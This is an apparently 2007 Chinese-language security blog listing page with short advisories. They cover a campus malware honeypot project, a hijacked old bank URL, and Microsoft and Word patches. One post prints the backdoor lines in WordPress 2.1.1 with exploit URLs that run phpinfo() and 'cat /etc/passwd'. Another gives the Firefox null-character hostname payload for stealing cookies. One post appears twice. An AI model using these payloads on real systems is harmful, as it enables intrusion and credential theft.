目前分類:資訊安全 (11)

瀏覽方式: 標題列表 簡短摘要
請按我..繼續閱讀全文....

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

請按我..繼續閱讀全文....

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

請按我..繼續閱讀全文....

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

計畫主旨:
台灣地區惡意程式所佔的比率節節高升,尤其是以校園為大宗。在普遍缺乏惡意程式基本知識的校園內,希望透過架設惡意程式誘捕系統來誘捕惡意程式與駭客攻擊行為,讓參與單位清楚掌握校園內惡意程式與駭客攻擊的來源,然後,對症下藥,以收成效。

請按我..繼續閱讀全文....

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

玉山票劵網址連至色情網站。查了一下,玉山票?已經併入玉山銀行,可能是他們沒有保留那個網址 (可能會影響玉山銀行商譽),使得有心人士利用此網址,誤導消費者連至那個色情網站。最麻煩的是很多網站還保留玉山票?舊網址,其中包含行政院金融監督管理委員會銀行局、台灣金融研訓院等 (已經通知他們,並且已經修復),應該還有蠻多網站都有此問題,各位可以利用搜尋引擎查一查囉。另外,我想玉山銀行應該要通報調查局,然後,調查局可以調查一下,倒底是什麼樣的狀況。(Credit: Edward)

**請幫忙通知他們,謝謝**

下圖是此色情網站首頁:

esunbills_home_20070411.gif

下圖是金管會含有此連結的網頁:

banking_gov_link_20070411.png

下圖是金管會修正此連結後的網頁:

banking_gov_fix_link_20070411.png

下圖是台灣金融研訓院含有此連結的網頁:

tabf_org_link_20070411.jpg

下圖是台灣金融研訓院修正此連結後的網頁:

tabf_org_fix_link_20070411.jpg

此色情網站的註冊資訊 (也許是網站被黑,也說不一定) :

whois_20070411.png

rogerspeaking 發表在 痞客邦 留言(1) 人氣()

著名的部落格軟體 WordPress 2.1.1 有安全漏洞,可以輕易地執行遠端程式碼,請盡速更新至 WordPress 2.1.2

有問題的檔案:

  • feed.php: if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

  • theme.php: if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }


如何利用此漏洞:

  • http://wordpressurl/wp-includes/feed.php?ix=phpinfo();

  • http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


受影響的版本:只有 2.1.1

至於詳細的資訊,請參考:

WordPress 2.1.1 Dangerous, Upgrade

WordPress source code compromised to enable remote code execution-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

PatchGuard 到底是什麼呢?這是微軟為了防止惡意程式或其他廠商修改 Windows 作業系統架構,所提供的一個 Windows 核心 (Kernel) 防護機制。此功能只支援 Windows x64 版本。

為什麼要保護 Windows 核心呢?如果惡意程式感染 Windows 核心,它就可以獲得至高無上的系統權限,可以為所欲為。很多駭客或安全專家都積極在嘗試破解此項功能,正如大家所預期,他們很快就找到方法,其中一個名為 Skywing,提供一些方法以繞過 PatchGuard 的檢測,如果各位有興趣的話,請參考 Bypassing PatchGuard on Windows x64Subverting PatchGuard Version 2 這兩篇文章。

安全性、便利性和功能性本來就無法兼顧,如果一味地強調安全性,那個系統一定很難操作以及很少功能,所以,如何取得平衡是一個很難抉擇的問題。-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

Firefox 對 DOM (Document Object Model) 屬性 "location.hostname" 處理不當,使得攻擊者有機會取得使用者含有機密資料的 Cookie 檔案。

此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。

受影響版本:2.0.0.1 或 其他 (未測試過)

如果你想要觀看此漏洞的展示,請看這裡

雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:

firefox_update.png

另外,再一次提醒各位,請勿瀏覽來路不明的網站。

至於詳細的資訊,請參考:

Zalewski cookie setting / same-domain bypass vulnerability

Firefox Same-Domain Bypass Vulnerability (NULL Character)

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

Firefox 對 DOM (Document Object Model) 屬性 "location.hostname" 處理不當,使得攻擊者有機會取得使用者含有機密資料的 Cookie 檔案。

此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。

受影響版本:2.0.0.1 或 其他 (未測試過)

如果你想要觀看此漏洞的展示,請看這裡

雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:

firefox_update.png

另外,再一次提醒各位,請勿瀏覽來路不明的網站。

至於詳細的資訊,請參考:

Zalewski cookie setting / same-domain bypass vulnerability

Firefox Same-Domain Bypass Vulnerability (NULL Character)

rogerspeaking 發表在 痞客邦 留言(20) 人氣()

西洋情人節當天,微軟發佈另一個 Word 安全漏洞,此漏洞允許攻擊者執行遠端程式碼。目前沒有修補程式。

受影響軟體:

  • Microsoft Office 2000 (Word 2000)

  • Microsoft Office XP (Word 2002)


至於其他詳細的資訊,請參考 Microsoft Security Advisory (933052)-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

昨天微軟發佈 2007 年 2 月 安全漏洞修補程式,包含 12 個安全公告,6 個為重大嚴重性 (Critical),6 個為重要嚴重性 (Important),如下所示:

  • Step-by-Step Interactive Training (MS07-005)

    • 最高的嚴重性等級:重要 (Important)

    • 允許遠端執行程式碼 (Could Allow Remote Code Execution)



  • Windows Shell (MS07-006)

    • 最高的嚴重性等級:重要 (Important)

    • 允許提升權限 (Could Allow Elevation of Privilege )



  • Windows Image Acquisition Service (MS07-007)

    • 最高的嚴重性等級:重要 (Important)

    • 允許提升權限



  • HTML Help ActiveX Control (MS07-008)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼



  • Microsoft Data Access Components (MS07-009)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼



  • Microsoft Malware Protection Engine (MS07-010)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼



  • Microsoft OLE Dialog (MS07-011)

    • 最高的嚴重性等級:重要 (Important)

    • 允許遠端執行程式碼



  • Microsoft MFC (MS07-012)

    • 最高的嚴重性等級:重要 (Important)

    • 允許遠端執行程式碼



  • Microsoft RichEdit (MS07-013)

    • 最高的嚴重性等級:重要 (Important)

    • 允許遠端執行程式碼



  • Microsoft Word (MS07-014)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼



  • Microsoft Office (MS07-015)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼



  • Cumulative Security Update for Internet Explorer (MS07-016)

    • 最高的嚴重性等級:重大 (Critical)

    • 允許遠端執行程式碼




至於其他詳細的部份,請參考 Microsoft Security Bulletin Summary for February, 2007-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()